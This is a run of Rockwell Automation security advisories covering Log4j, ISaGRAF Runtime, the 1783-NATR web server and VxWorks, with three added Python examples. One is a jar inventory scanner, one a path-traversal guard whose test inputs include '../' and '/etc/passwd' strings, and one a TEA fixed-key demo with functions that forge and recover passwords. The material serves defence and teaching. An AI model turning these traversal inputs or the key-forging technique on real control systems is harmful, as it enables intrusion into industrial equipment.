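Two passages on this page reduce to the same inventory question: PN1592 lists third-party components and versions bundled in FTPC, and this advisory notes that log4j jars on disk will be picked up by scanners whether or not the risky classes are in use. The following Python script is an added example (editor's tooling, not a Rockwell utility): it walks a directory, reads the Maven coordinates each jar embeds in META-INF/maven/**/pom.properties, flags log4j-core versions in the CVE-2021-44228 ranges quoted above, reports whether JndiLookup.class is present (including in shaded "fat" jars that carry no coordinates of their own), lists whether a log4j 1.2 jar still contains the JMSAppender and SocketServer classes, and matches coordinates against two PN1592 entries. Assumptions: the jars are constructed fixtures; the Maven coordinates for the PN1592 components are assumed from their upstream names; jars nested inside WAR/EAR archives are not descended into.

```python
"""Inventory Java archives on disk and flag the Log4j versions named in this advisory (added example)."""
import re
import tempfile
import zipfile
from pathlib import Path

LOG4J2_CORE = ("org.apache.logging.log4j", "log4j-core")
LOG4J1 = ("log4j", "log4j")
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J1_RISKY = ("org/apache/log4j/net/JMSAppender.class", "org/apache/log4j/net/SocketServer.class")
# Assumed Maven coordinates for two PN1592 components (the advisory names products, not coordinates).
PN1592_COMPONENTS = {
    ("com.fasterxml.jackson.core", "jackson-databind"): "2.1.4",
    ("commons-beanutils", "commons-beanutils"): "1.9.0",
}


def version_key(version):
    """'2.14.1' -> (2, 14, 1). Pre-release suffixes such as '-beta9' are dropped, which errs toward flagging."""
    return tuple(int(x) for x in re.findall(r"\d+", version.split("-")[0]))


def log4shell_affected(version):
    """CVE-2021-44228 ranges as stated in this advisory: 2.0-beta9..2.12.1 and 2.13.0..2.15.0."""
    key = version_key(version)
    return (2, 0) <= key <= (2, 12, 1) or (2, 13, 0) <= key <= (2, 15, 0)


def maven_coordinates(jar):
    """Yield (groupId, artifactId, version) for every META-INF/maven/**/pom.properties in an open ZipFile."""
    for name in jar.namelist():
        if name.startswith("META-INF/maven/") and name.endswith("/pom.properties"):
            props = dict(
                line.split("=", 1)
                for line in jar.read(name).decode("utf-8", "replace").splitlines()
                if "=" in line and not line.lstrip().startswith("#")
            )
            if {"groupId", "artifactId", "version"} <= props.keys():
                yield props["groupId"].strip(), props["artifactId"].strip(), props["version"].strip()


def inventory(root):
    """Open every .jar/.war/.ear below root and report one finding per embedded Maven artifact."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not (path.is_file() and path.suffix.lower() in {".jar", ".war", ".ear"}):
            continue
        with zipfile.ZipFile(path) as jar:
            entries = set(jar.namelist())
            coords = list(maven_coordinates(jar))
            if JNDI_LOOKUP in entries and LOG4J2_CORE not in {(g, a) for g, a, _ in coords}:
                coords.append((*LOG4J2_CORE, "unknown (shaded, no pom.properties)"))  # fat/uber jar case
            for group, artifact, version in coords:
                key = (group, artifact)
                findings.append({
                    "file": path.name,
                    "coordinate": f"{group}:{artifact}:{version}",
                    "cve_2021_44228": key == LOG4J2_CORE and (version.startswith("unknown") or log4shell_affected(version)),
                    "jndi_lookup_class": JNDI_LOOKUP in entries,
                    "log4j1_risky_classes": [e.rsplit("/", 1)[1] for e in LOG4J1_RISKY if e in entries] if key == LOG4J1 else [],
                    "listed_in_pn1592": PN1592_COMPONENTS.get(key) == version,
                })
    return findings


def by_coordinate(findings):
    return {f["coordinate"]: f for f in findings}


def _write_jar(path, group, artifact, version, extra=()):
    """Constructed fixture: a minimal jar with Maven metadata and optional empty class entries."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(f"META-INF/maven/{group}/{artifact}/pom.properties",
                     f"#generated\ngroupId={group}\nartifactId={artifact}\nversion={version}\n")
        for entry in extra:
            jar.writestr(entry, b"")


def demo():
    """Build a constructed lib/ directory, inventory it and return the findings."""
    lib = Path(tempfile.mkdtemp()) / "lib"
    lib.mkdir()
    _write_jar(lib / "log4j-core-2.14.1.jar", *LOG4J2_CORE, "2.14.1", extra=[JNDI_LOOKUP])
    _write_jar(lib / "log4j-core-2.17.1.jar", *LOG4J2_CORE, "2.17.1")
    _write_jar(lib / "log4j-1.2.17.jar", *LOG4J1, "1.2.17", extra=LOG4J1_RISKY)
    _write_jar(lib / "jackson-databind-2.1.4.jar", "com.fasterxml.jackson.core", "jackson-databind", "2.1.4")
    _write_jar(lib / "app-all.jar", "com.example", "app", "1.0", extra=[JNDI_LOOKUP])  # shaded copy of log4j-core
    return inventory(lib)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

A jar that reports a log4j 1.2 coordinate with JMSAppender.class present is what the scanners mentioned above alert on; the advisory's point is that presence is not use, so the next step for such a hit is to confirm the log4j configuration does not reference JMSAppender or SocketServer, or to remove those classes from the jar.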

General Security Guidelines

See the Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Industrial Security Services website for information on security services from Rockwell Automation to assess, protect, detect, respond and recover from incidents. These services include assessments, designs, implementations, industrial anomaly detection, patch management, and remote infrastructure monitoring and administration.

We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located in PN1354 – Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website .

If you have questions regarding this notice, please send an email to our product security inbox at: secure@ra.rockwell.com.

General Mitigations

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • Visit links below for more mitigation techniques
Additional Links
  • NVD - CVE-2021-44228 (nist.gov)
  • NVD - CVE-2021-45046 (nist.gov)
  • NVD - CVE-2021-4104 (nist.gov)
  • NVD - CVE-2019-17571 (nist.gov)
  • Apache Log4j Vulnerability Guidance | CISA
  • Log4j – Apache Log4j Security Vulnerabilities
  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Critical
PN1567 | ISaGRAF Runtime Affected by Multiple Vulnerabilities
Published Date:
December 30, 2021
Last Updated:
December 30, 2021
CVE IDs:
CVE-2020-25184, CVE-2020-25180, CVE-2020-25176, CVE-2020-25182, CVE-2020-25178
Products:
AADvance, ISaGRAF, Micro800
CVSS Scores:
9.1, 7.8, 5.3, 7.5, 6.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision Number: 1.3
Revision History
Version 1.3 – March 19, 2024. Added AADvance Eurocard controller to Affected Products and updated Suggested Actions for AADvance Eurocard controller
Version 1.2 – December 30, 2021. Updated Suggested Actions for AADvance® Controller version 1.40 and earlier

Executive Summary

Rockwell Automation received a report from Kaspersky regarding five vulnerabilities in ISaGRAF® Runtime 4 and 5. If successfully exploited, these vulnerabilities may result in remote code execution, information disclosure, or denial of service.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

ISaGRAF Runtime 4.x and 5.x
The following Rockwell Automation products are based on ISaGRAF to design integrated automation solutions:
  • AADvance® Controller version 1.32 and earlier
  • ISaGRAF Free Runtime in ISaGRAF6 Workbench version 6.6.8 and earlier
  • Micro800™  family, all versions

Vulnerability Details

CVE-2020-25176: Code Execution due to Relative Path Traversal
Some commands used by the ISaGRAF eXchange Layer (IXL) protocol perform various file operations in the file system. Since the parameter pointing to the file name is not checked for reserved characters, it is possible for a remote attacker authenticated on the IXL protocol to traverse an application’s directory, which could lead to remote code execution.

CVSS v3.1 Base Score: 9.1/10 [CRITICAL]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
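The defect described above, a protocol-supplied file name joined onto an application directory without checking for reserved characters, is the classic relative path traversal. The following Python script is an added example (editor's illustration, not ISaGRAF code and not the IXL protocol): it contrasts the naive join with a resolver that allows only plain relative names, rejects traversal and reserved characters up front, and then confirms that the fully resolved path (symlinks followed) still sits under the application directory. The directory layout, file names and the planted symlink are constructed.

```python
"""Confining protocol-supplied file names to the application directory (added example)."""
import os
import tempfile
from pathlib import Path


class PathOutsideApplicationDir(ValueError):
    """Raised when a requested name would read or write outside the runtime's application directory."""


def unsafe_resolve(app_dir, requested):
    """The vulnerable pattern: join the protocol-supplied name onto the base directory and trust the result."""
    return os.path.join(app_dir, requested)


def safe_resolve(app_dir, requested):
    """Allow only plain relative names: reject reserved characters, traversal and any path resolving outside app_dir."""
    if not requested or any(ch in requested for ch in '\0\\:*?"<>|'):
        raise PathOutsideApplicationDir(f"reserved character in {requested!r}")
    parts = requested.split("/")
    if requested.startswith("/") or any(part in ("", ".", "..") for part in parts):
        raise PathOutsideApplicationDir(f"absolute path or traversal in {requested!r}")
    base = Path(app_dir).resolve()
    target = (base / requested).resolve()   # resolve() follows symlinks, so a planted link cannot escape either
    if base not in target.parents:          # the syntactic checks alone would have passed "link/secret"
        raise PathOutsideApplicationDir(f"{requested!r} escapes {base}")
    return target


def demo():
    """Constructed layout: app dir with a program file, a sibling directory, and (where permitted) a symlink out."""
    root = Path(tempfile.mkdtemp())
    app = root / "isagraf_app"
    (app / "programs").mkdir(parents=True)
    (app / "programs" / "prog1.bin").write_bytes(b"\x00")
    (root / "outside").mkdir()
    requests = ["programs/prog1.bin", "../outside/secret", "programs/../../outside/secret", "/etc/passwd", "programs\\..\\x"]
    try:
        os.symlink(root / "outside", app / "link")   # attacker-planted link; creation may need privileges on Windows
        requests.append("link/secret")
    except OSError:
        pass
    results = {}
    for name in requests:
        try:
            results[name] = safe_resolve(app, name).relative_to(app.resolve()).as_posix()
        except PathOutsideApplicationDir:
            results[name] = "rejected"
    naive = Path(unsafe_resolve(app, "../outside/secret")).resolve()
    results["unsafe:../outside/secret"] = "escaped" if app.resolve() not in naive.parents else "contained"
    return results


if __name__ == "__main__":
    for request, outcome in demo().items():
        print(f"{request!r:40} -> {outcome}")
```

The order of checks matters: the string-level rejection of ".." and separators gives a clear error for ordinary traversal, while the resolved-path comparison is what actually enforces the boundary against symlinks and anything the string checks did not anticipate. Note that on the runtime side this check has to run for every IXL command that names a file, not just the one found during research.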

CVE-2020-25184: Information Disclosure due to cleartext storage of passwords in a file and memory
ISaGRAF Runtime stores the password in plaintext in a file which is located in the same directory with the executable file. ISaGRAF Runtime reads the file and saves the data in a variable without any additional modification. A local, unauthenticated attacker could compromise the user passwords resulting in information disclosure.

CVSS v3.1 Base Score: 7.8/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2020-25178: Information Disclosure due to Cleartext Transmission of Information
ISaGRAF Workbench communicates with ISaGRAF Runtime using TCP/IP. The communication protocol provides various file system operations as well as uploading applications. Data is transferred over this protocol unencrypted, which could allow a remote, unauthenticated attacker to upload, read and delete files.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2020-25182: Code Execution due to Uncontrolled Search Path Element
ISaGRAF Runtime searches and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects Microsoft Windows systems running ISaGRAF Runtime.

CVSS v3.1 Base Score: 6.7/10 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2020-25180: Information Disclosure due to Hard-coded Cryptographic Key
ISaGRAF Runtime includes the functionality of setting a password that is required to execute privileged commands. The password value passed to ISaGRAF Runtime is the result of encrypting the entered or saved password with the Tiny Encryption Algorithm (TEA) under a fixed key. Because the key is the same on every installation, a remote, unauthenticated attacker can produce a valid encrypted password value themselves and pass it to ISaGRAF 5 Runtime, which may result in information disclosure on the device.

CVSS v3.1 Base Score: 5.3/10 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
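The point of CVE-2020-25180 is easy to state but worth seeing in code: encryption under a key that ships in every copy of the product is a reversible encoding, not a secret. The following Python script is an added example (editor's illustration, not ISaGRAF code): it implements standard 32-round TEA, uses a hypothetical fixed key in place of the product's real one (which this advisory does not publish), and shows that whoever holds that key both forges a value the runtime accepts and turns a value captured off the wire (CVE-2020-25178 above) back into the password. The block framing (little-endian words, ECB, zero padding) is assumed for illustration; the product's actual framing is not documented here.

```python
"""TEA under a fixed key: anyone with the key produces and reverses the same values (added example)."""
import struct

MASK = 0xFFFFFFFF
DELTA = 0x9E3779B9
# Hypothetical key standing in for the fixed key embedded in the runtime; the advisory does not publish the real one.
FIXED_KEY = (0x11223344, 0x55667788, 0x99AABBCC, 0xDDEEFF00)


def tea_encrypt_block(v0, v1, key):
    """Standard 32-round TEA (Wheeler and Needham) on one 64-bit block held as two 32-bit words."""
    total = 0
    for _ in range(32):
        total = (total + DELTA) & MASK
        v0 = (v0 + ((((v1 << 4) & MASK) + key[0]) ^ (v1 + total) ^ ((v1 >> 5) + key[1]))) & MASK
        v1 = (v1 + ((((v0 << 4) & MASK) + key[2]) ^ (v0 + total) ^ ((v0 >> 5) + key[3]))) & MASK
    return v0, v1


def tea_decrypt_block(v0, v1, key):
    """Inverse of tea_encrypt_block: same schedule run backwards."""
    total = (DELTA * 32) & MASK
    for _ in range(32):
        v1 = (v1 - ((((v0 << 4) & MASK) + key[2]) ^ (v0 + total) ^ ((v0 >> 5) + key[3]))) & MASK
        v0 = (v0 - ((((v1 << 4) & MASK) + key[0]) ^ (v1 + total) ^ ((v1 >> 5) + key[1]))) & MASK
        total = (total - DELTA) & MASK
    return v0, v1


def _words(data):
    """Zero-pad to a multiple of 8 bytes and split into little-endian 32-bit word pairs (framing is assumed)."""
    data = data + b"\0" * (-len(data) % 8)
    return [struct.unpack("<2I", data[i:i + 8]) for i in range(0, len(data), 8)]


def encrypt_password(password, key=FIXED_KEY):
    """What the client sends: each block of the password encrypted independently under the built-in key."""
    return b"".join(struct.pack("<2I", *tea_encrypt_block(v0, v1, key)) for v0, v1 in _words(password.encode()))


def decrypt_password(blob, key=FIXED_KEY):
    plain = b"".join(struct.pack("<2I", *tea_decrypt_block(v0, v1, key)) for v0, v1 in _words(blob))
    return plain.rstrip(b"\0").decode()


def runtime_accepts(stored_password, submitted_blob):
    """Runtime-side check modelled on the advisory: decrypt with the built-in key, compare with the stored password."""
    return decrypt_password(submitted_blob) == stored_password


def attacker_forges(guess):
    """Anyone who pulled the key from the binary computes exactly what the legitimate Workbench would send."""
    return encrypt_password(guess, FIXED_KEY)


def attacker_recovers(captured_blob):
    """The same key turns a value sniffed off the wire back into the password."""
    return decrypt_password(captured_blob, FIXED_KEY)


if __name__ == "__main__":
    token = encrypt_password("plant-pw-2021")
    print("on the wire:", token.hex())
    print("recovered by anyone with the key:", attacker_recovers(token))
    print("forged value accepted:", runtime_accepts("plant-pw-2021", attacker_forges("plant-pw-2021")))
```

Nothing here is a weakness of TEA itself; it is the key management. The remedy is a per-device or per-session secret and a challenge-response or authenticated channel (the firmware updates listed below are the vendor's fix), combined with the network restrictions on TCP 1131 given in the mitigation table so that the value is not observable in the first place.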

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to the available software and firmware revisions that address these vulnerabilities and, where that is not possible, to apply the risk mitigations below. Customers are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense-in-depth strategy.

Vulnerability | Affected Products | Suggested Mitigations

CVE-2020-25176
Affected Products: AADvance Controller, ISaGRAF5 Runtime, Micro800 family, AADvance Eurocard controller
Suggested Mitigations:
  • Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and AADvance Controller firmware to version 1.041.3.
  • Customers should confirm that the least-privilege user principle is followed, and that user/service account access to the Runtime's folder location is granted with the minimum number of rights needed.
  • For ISaGRAF, customers are encouraged to restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF, refer to the product documentation.
  • Since ISaGRAF 5 Runtime is provided to customers as a development kit, implementing least privilege may vary from implementation to implementation based on the hardware in use.
  • For AADvance controllers, customers should update to version 1.041.3 to mitigate this vulnerability.
  • For the Micro800 family, to reduce risk, customers are encouraged to protect the controller with a password. Additionally, customers deploying Micro870®, Micro850®, or Micro830® controllers are encouraged to set the controller's mode switch to "RUN". Customers are encouraged to restrict or block traffic on TCP 44818 from outside the industrial control system network zone.
  • Customers should also confirm they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible.
  • For more information on the TCP/UDP ports used by Rockwell Automation products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • Rockwell Automation recommends upgrading AADvance Eurocard Controller firmware to version 1.041.

CVE-2020-25178
Affected Products: AADvance Controller, ISaGRAF5 Runtime, Micro800 family, AADvance Eurocard controller
Suggested Mitigations:
  • Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and AADvance Controller firmware to version 1.041.3.
  • Customers should confirm that the least-privilege user principle is followed, and that user/service account access to the Runtime's folder location is granted with the minimum number of rights needed.
  • Since ISaGRAF 5 Runtime is provided to customers as a development kit, implementing least privilege may vary from implementation to implementation based on the hardware in use.
  • Rockwell Automation recommends upgrading AADvance Eurocard Controller firmware to version 1.041.

CVE-2020-25182
Affected Products: ISaGRAF5 Runtime
Suggested Mitigations:
  • Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00.
  • Customers should confirm that the least-privilege user principle is followed, and that user/service account access to the Runtime's folder location is granted with the minimum number of rights needed.
  • Since ISaGRAF 5 Runtime is provided to customers as a development kit, implementing least privilege may vary from implementation to implementation based on the hardware in use.

CVE-2020-25184
Affected Products: AADvance Controller, ISaGRAF5 Runtime, AADvance Eurocard controller
Suggested Mitigations:
  • Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and AADvance Controller firmware to version 1.041.3.
  • Customers should confirm that the least-privilege user principle is followed, and that user/service account access to the Runtime's folder location is granted with the minimum number of rights needed.
  • For ISaGRAF, restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF, refer to the product documentation.
  • Since ISaGRAF 5 Runtime is provided to customers as a development kit, implementing least privilege may vary from implementation to implementation based on the hardware in use.
  • For AADvance controllers, customers should update to version 1.041.3 to mitigate this vulnerability.
  • Rockwell Automation recommends upgrading AADvance Eurocard Controller firmware to version 1.041.

CVE-2020-25180
Affected Products: AADvance Controller, ISaGRAF5 Runtime, AADvance Eurocard controller
Suggested Mitigations:
  • To reduce risk, customers should confirm they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. See the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices on deploying network segmentation and broader defense-in-depth strategies.
  • Customers should consider using proper network infrastructure controls, such as firewalls, UTM devices, VPNs, or other security appliances.
  • For ISaGRAF, restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF, refer to the product documentation.
  • Since ISaGRAF 5 Runtime is provided to customers as a development kit, implementing least privilege may vary from implementation to implementation based on the hardware in use.
  • For AADvance controllers, customers should update to version 1.041.3 to mitigate this vulnerability.
  • Rockwell Automation recommends upgrading AADvance Eurocard Controller firmware to version 1.041.
 

General Security Guidelines

  • Use proper network infrastructure controls, such as firewalls, to help ensure that any communication protocols from unauthorized sources are blocked.
  • Block traffic to all protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to ports using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports, refer to the product documentation.
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources is only granted with a minimum number of rights as needed.
  • Do not open untrusted .isasln and .acfproj files with ISaGRAF6 Workbench.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-20-280-01

 

Critical
PN1580 | GoAhead Web Server vulnerability in 1783-NATR
Published Date:
December 16, 2021
Last Updated:
December 16, 2021
CVE IDs:
CVE-2019-5097, CVE-2019-5096
Products:
Network Address Translation (NAT) Device
CVSS Scores:
7.5, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.2
Revision History
Version 1.0 – December 15, 2021
Version 1.1 - December 16, 2021: Updated Suggested Actions
Version 1.2 – January 21, 2021: Updated Suggested Actions To Mitigate

Executive Summary

Rockwell Automation received a report from Cisco® Talos™ Researchers regarding two vulnerabilities in the 1783-NATR. If successfully exploited, these vulnerabilities may result in remote code execution on the device through the GoAhead web server and a denial-of-service condition.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Detailed Information

CVE-2019-5096: GoAhead web server allows unauthenticated HTTP requests that may result in remote code execution

A remote, unauthenticated attacker may be able to send a specially crafted HTTP request that leads to a use-after-free condition while the request is processed. The freed memory can be used to corrupt heap structures, which could allow the attacker to achieve remote code execution.

CVSS v3.1 Base Score: 9.8/10 [Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-5097: GoAhead web server allows specially crafted HTTP requests that may result in a denial-of-service for the device.

A remote, unauthenticated attacker may be able to send a specially crafted HTTP request that can lead to an infinite loop in the process. The request can be unauthenticated, in the form of a GET or POST request, and does not require the requested resource to be present on the server, which would lead to a denial-of-service condition on the device.

CVSS v3.1 Base Score: 7.5/10 [High]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Affected Products

1783-NATR version 1.005

Risk Mitigation & User Action

Customers using the affected 1783-NATR are encouraged to update to an available firmware revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

| Vulnerability | Suggested Actions |
|---|---|
| CVE-2019-5096 | Upgrade firmware to version 1.006 to mitigate this vulnerability. |
| CVE-2019-5097 | Upgrade firmware to version 1.006 to mitigate this vulnerability. |

General Security Guidelines

Network-based vulnerability mitigations for embedded products

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic to HTTP port 80 from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware mode switch setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to Port#80 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

General mitigations

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/security notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • NVD - CVE-2019-5096 (nist.gov)
  • NVD - CVE-2019-5097 (nist.gov)

Critical
PN1494 | VxWorks Vulnerabilities affect Programmable Automation Controllers, EtherNet/IP Communication Modules, I/O Modules, Kinetix 6500 Servo Drive, High-Frequency RFID Interface Block
Published Date:
August 11, 2021
Last Updated:
October 04, 2024
CVE IDs:
CVE-2019-12260, CVE-2019-12265, CVE-2019-12257, CVE-2019-12258, CVE-2019-12256, CVE-2019-12255, CVE-2019-12263, CVE-2019-12262, CVE-2019-12264, CVE-2019-12261, CVE-2019-12259
Products:
Network Address Translation (NAT) Device, 5069 Compact I/O, 1732E ArmorBlock I/O, Ethernet/IP Connected Products, High-Frequency RFID, 1756 ControlLogix I/O
CVSS Scores (v3.1):
9.8, 8.8, 7.5, 8.1, 6.3, 7.1, 5.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Revision History
Revision Number
1.6
Revision History
October 1, 2024 – Version 1.6. Updated Affected Catalog Numbers and Suggested Actions for ControlLogix EtherNet/IP Module.
04-August-2021 – Version 1.5. Updated firmware available for 1747-AENTR and 1769-AENTR.
02-March-2020 - Version 1.4. Updated suggested risk mitigation & user actions. The Rockwell Automation PSIRT has updated the suggested actions for the ControlLogix 5580, GuardLogix 5580, CompactLogix 5380, and CompactLogix 5380. Please refer to the Risk Mitigation & User Action section below for more information.
11-November-2020 - Version 1.3. Corrected suggested actions. The Rockwell Automation PSIRT has updated the suggested actions for the ControlLogix 5580 and CompactLogix. Please refer to the Risk Mitigation & User Action section below for more information.
16-November-2019 - Version 1.2. Updated Advisory. Rockwell Automation completed an investigation into the additional, impacted real-time operating systems reported in ICS-CERT Advisory: ICSA-19-274-0, and concluded that no products are affected by this new advisory.
09-October-2019 - Version 1.1. Updated Advisory. On October 1st, 2019, it was reported (ICS-CERT Advisory: ICSA-19-274-01) that the series of TCP/IP stack vulnerabilities originally reported as impacting VxWorks systems were now found to impact additional real-time operating system vendors including ENEA, Green Hills Software, ITRON, and IP Infusion. Rockwell Automation is not aware of any products affected by the new advisory. An investigation is ongoing and this advisory will be updated when the investigation is complete.
30-July-2019 - Version 1.0. Initial Release.

Executive Summary

Armis, an Internet of Things (IoT) security firm, reported a total of eleven vulnerabilities to WindRiver that affect VxWorks, a real-time operating system (RTOS) utilized by many different technology vendors, including Rockwell Automation™. These vulnerabilities, if successfully exploited, may result in several impacts ranging from packet information disclosure to allowing a threat actor to execute arbitrary code on the targeted device.

Not every VxWorks vulnerability applies to every impacted product family. Please see the table under Affected Products for a full list of the potentially affected Rockwell Automation products and the corresponding VxWorks vulnerabilities, which are identified by their Common Vulnerabilities and Exposures (CVE) ID.

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available. Please subscribe to updates to this advisory and the Industrial Security Advisory Index (Knowledgebase ID 54102) to stay notified.

Customers using potentially affected products are encouraged to evaluate their own systems and apply the appropriate mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products

| Product Family | Catalogs | CVE-2019-12255 | CVE-2019-12256 | CVE-2019-12257 | CVE-2019-12258 | CVE-2019-12259 | CVE-2019-12260 | CVE-2019-12261 | CVE-2019-12262 | CVE-2019-12263 | CVE-2019-12264 | CVE-2019-12265 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| CompactLogix™ 5480 (EPIC controller) | 5069-L4 |   | x |   | x |   | x | x | x | x | x | x |
| Compact 5000™ I/O EtherNet/IP Adapter | 5069-AEN2TR |   | x |   | x |   | x | x | x | x | x | x |
| ControlLogix® 5580 (+ GuardLogix®) | 1756-L8 |   | x |   | x |   | x | x | x | x | x | x |
| CompactLogix Compact GuardLogix 5380 | 5069-L3, 5069-L3S2 |   | x |   | x |   | x | x | x | x | x | x |
| CompactLogix 5370 | 1769-L3 | x |   | x | x |   |   | x | x | x | x | x |
